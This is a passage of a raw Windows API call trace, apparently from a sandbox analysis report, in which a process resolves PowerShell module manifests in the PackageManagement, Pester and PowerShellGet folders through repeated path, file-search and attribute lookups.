files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0218.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0218.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0218.614] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d540 [0218.615] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.615] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb512ac95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0218.615] FindNextFileW (in: hFindFile=0x784d540, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.615] FindClose (in: hFindFile=0x784d540 | out: hFindFile=0x784d540) returned 1 [0218.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0218.616] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0218.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a59065a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5da012f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5da012f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0218.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.622] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0218.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0218.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0218.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0218.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57cd840 | out: lpFileInformation=0x57cd840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a59065a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5da012f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5da012f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0218.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.623] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0218.623] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0218.623] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0218.624] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0218.624] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0218.624] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0218.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0218.624] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0218.624] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784dac0 [0218.624] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.625] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb51e338c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0218.625] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb529e7f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 1 [0218.625] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.625] FindClose (in: hFindFile=0x784dac0 | out: hFindFile=0x784dac0) returned 1 [0218.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.626] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.626] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fbcba3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96fbcba3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96fbcba3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0218.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57cf394 | out: lpFileInformation=0x57cf394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fbcba3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96fbcba3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96fbcba3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0218.629] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.629] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0218.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0218.640] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0218.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.641] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57cf644 | out: lpFileInformation=0x57cf644*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0218.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.ni.dll")) returned 0xffffffff [0218.641] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0218.642] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea58) returned 1 [0218.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0218.642] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0218.642] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784dac0 [0218.642] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.642] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53ec4f8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0218.642] FindNextFileW (in: hFindFile=0x784dac0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0218.642] FindClose (in: hFindFile=0x784dac0 | out: hFindFile=0x784dac0) returned 1 [0218.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea14) returned 1 [0218.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea20) returned 1 [0218.643] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0218.643] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0218.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9ec) returned 1 [0218.643] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933ea68 | out: lpFileInformation=0x933ea68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0218.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e8) returned 1 [0218.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0218.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0218.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0218.646] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0218.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933ea10) returned 1 [0218.646] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x57d0d00 | out: lpFileInformation=0x57d0d00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0218.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933ea0c) returned 1 [0218.646] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0218.646] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0218.646] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0218.646] GetFileAttributesW 